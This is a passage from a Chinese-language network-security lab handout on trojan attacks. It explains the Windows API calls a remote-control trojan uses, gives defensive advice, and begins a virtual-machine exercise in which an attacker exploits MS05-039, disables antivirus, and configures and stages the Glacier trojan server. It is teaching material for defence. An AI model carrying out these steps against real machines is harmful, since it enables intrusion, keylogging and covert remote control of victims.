2.2木马攻击原理特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。
木马,其实质就是一个通过端口进行通信的网络客户/服务程序。
(1)基本概念网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。
对于特洛伊木马,被控制端就成为一台服务器,控制端则是一台客户机,G_server.exe是守护进程,G_client是客户端应用程序。
(2)实现木马的控制功能由于Win98开放了所有的权限给用户,因此,以用户权限运行的木马程序几乎可以控制一切,下面仅对木马的主要功能进行简单的概述,主要是使用Windows API函数。
①远程监控(控制对方鼠标、键盘,并监视对方屏幕)●keybd_event模拟一个键盘动作。
●mouse_event模拟一次鼠标事件●mouse_event(dwFlags,dx,dy,cButtons,dwExtraInfo)dwFlags:●MOUSEEVENTF_ABSOLUTE 指定鼠标坐标系统中的一个绝对位置●MOUSEEVENTF_MOVE 移动鼠标●MOUSEEVENTF_LEFTDOWN 模拟鼠标左键按下●MOUSEEVENTF_LEFTUP 模拟鼠标左键抬起●MOUSEEVENTF_RIGHTDOWN 模拟鼠标右键按下●MOUSEEVENTF_RIGHTUP 模拟鼠标右键按下●dx,dy:MOUSEEVENTF_ABSOLUTE中的鼠标坐标。
②记录各种口令信息keylog begin:将击键记录在一个文本文件里,同时还记录执行输入的窗口名。
③获取系统信息a.取得计算机名GetComputerNameb.更改计算机名SetComputerNamec.当前用户GetUserNamed.系统路径e.取得系统版本f.当前显示分辨率④限制系统功能a.远程关机或重启计算机,使用WinAPI中的如下函数可以实现。
ExitWindowsEx(UINT uFlags,DWORD dwReserved) 当uFlags=EWX_LOGOFF 中止进程,然后注销=EWX_SHUTDOWN 关掉系统但不关电源=EWX_REBOOT 重新引导系统=EWX_FORCE强迫中止没有响应的进程=EWX_POWERDOWN 关掉系统及关闭电源b.锁定鼠标,ClipCursor(lpRect As RECT)可以将指针限制到指定区域,或者用ShowCursor(FALSE)把鼠标隐藏起来也可以,RECT是定义的一个矩形。
c.让对方掉线RasHangUpd.终止进程ExitProcesse.关闭窗口利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口⑤远程文件操作删除文件:File delete拷贝文件:File copy共享文件:Export list(列出当前共享的驱动器、目录、权限及共享密码)⑥注册表操作在VB中只要Set RegEdit=CreateObject("WScript.Shell")就可以使用以下的注册表功能:删除键值:RegEdit.RegDelete RegKey增加键值:RegEdit.Write RegKey,RegValue获取键值:RegEdit.RegRead (Value)2.3 木马的防范建议A.不要随意打开来历不明的邮件现在许多木马都是通过邮件来传播的,当你收到来历不明的邮件时,请不要打开,应尽快删除。
并加强邮件监控系统,拒收垃圾邮件。
B.不要随意下载来历不明的软件最好是在一些知名的网站下载软件,不要下载和运行来历不明的软件。
在安装软件的同时最好用杀毒软件查看有没有病毒,之后才进行安装。
C.及时修补漏洞和关闭可疑的端口一般木马都是通过漏洞在系统上打开端口留下后门,以便上传木马文件和执行代码,在把漏洞修补上的同时,需要对端口进行检查,把可疑的端口关闭。
D.尽量少用共享文件夹如果必须使用共享文件夹,则最好设置帐号和密码保护。
注意千万不要将系统目录设置成共享,最好将系统下默认共享的目录关闭。
Windows系统默认情况下将目录设置成共享状态,这是非常危险的。
E.运行实时监控程序在上网时最好运行反木马实时监控程序和个人防火墙,并定时对系统进行病毒检查。
F.经常升级系统和更新病毒库。
3.实验环境1)预备知识要求●了解网络的基本知识;●熟练使用windows操作系统;●充分理解木马攻击原理;●熟悉缓冲溢出攻击。
2)下载和运行木马软件期间,请关闭杀毒软件的自动防护功能以及防火墙,否则程序会被当作病毒而强行终止。
3.1 运行环境1)需要下载的其它的工具软件有:●tftpd32.exe:tftp服务程序,用来传输“冰河”木马服务端程序●nc.exe:缓冲溢出攻击反向连接服务程序(参见“缓冲区溢出攻击与防范实验”);●Ms05039.exe:缓冲溢出攻击工具(参见“缓冲区溢出攻击与防范实验”);●冰河木马.exe:冰河木马程序;●gwboy092.exe:“广外男生”木马程序。
2)本实验需要用到虚拟机,因此每台实验主机都通过安装软件WMware Workstation分割出虚拟机。
真实主机P1的配置为:操作系统Windows2000 server或者windows xp sp2,并且安装ms05-039.exe缓冲区溢出攻击软件,“冰河”木马,“广外男生”木马。
虚拟机P2配置为:操作系统Windows2000 Server(没有打补丁,存在ms05039漏洞,并且安装了IIS组件)。
3)实验环境拓扑如图1所示:图1 实验网络拓扑图请根据实验环境将IP地址填入下表,表1 实验IP实验中,可把真实机P2作为攻击机,安装上“冰河”木马程序,ms05039.exe,nc.exe,tftpd32.exe和“广外男生”;虚拟机P3作为被攻击主机,安装IIS组件。
4.实验内容和步骤4.1 实验任务一:“冰河”木马本实验需要把真实主机作为攻击机,虚拟机作为靶机。
即首先利用ms05039溢出工具入侵虚拟机,然后利用“冰河”木马实现对虚拟机的完全控制。
最后对木马进行查杀。
A.“冰河”使用:冰河是一个基于TCP/IP协议和Windows操作系统的网络工具,所以首先应确保该协议已被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控的计算机上运行服务器端监控程序即可。
主要文件包括:a. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以先通过“G_Client”的配置本地服务器程序功能进行一些特殊配置,例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等);b. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。
具体功能操作包括:a.添加主机:将被监控IP地址添加至主机列表,同时设置好访问口令及端口,设置将保存在Operate.ini文件中,以后不必重输。
如果需要修改设置,可以重新添加该主机,或在主界面工具栏内重新输入访问口令及端口并保存设置。
b. 删除主机:将被监控端IP地址从主机列表中删除。
c. 自动搜索:搜索指定子网内安装有冰河的计算机。
d. 查看屏幕:查看被监控端屏幕。
e. 屏幕控制:远程模拟鼠标及键盘输入。
f.“冰河”信使:点对点聊天室。
g. 修改远程配置:在线修改访问口令,监听端口等服务器程序设置,不需要重新上传整个文件,修改后立即生效。
B.在对“冰河”有所了解之后,我们进入攻防实验阶段——使用“冰河”对目标计算机进行控制:在目标主机(虚拟机)上植入木马,即在此主机上运行G_Sever,作为服务器端;在攻击机上运行G_Client,作为控制端。
分别运行这两个.exe文件后,我们进入控制端主界面,按照以下步骤来实现对目标主机的控制。
步骤1:入侵准备工作1)下载和安装木马软件前,关闭杀毒软件的自动防护功能,避免程序会被当作病毒而强行终止。
2)运行G_CLIENT.EXE,如图2;3)选择菜单“设置”->“配置服务程序”,如图3;图3 设置木马服务4)设置访问口令为“1234567”,其它为默认值,点击“确定”生成木马的服务端程序G_SERVER.EXE。
5)将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32,如图4。
图4将G_SERVER.EXE拷贝到目录C:\攻防\tftp326)运行tftpd32.exe,如图5。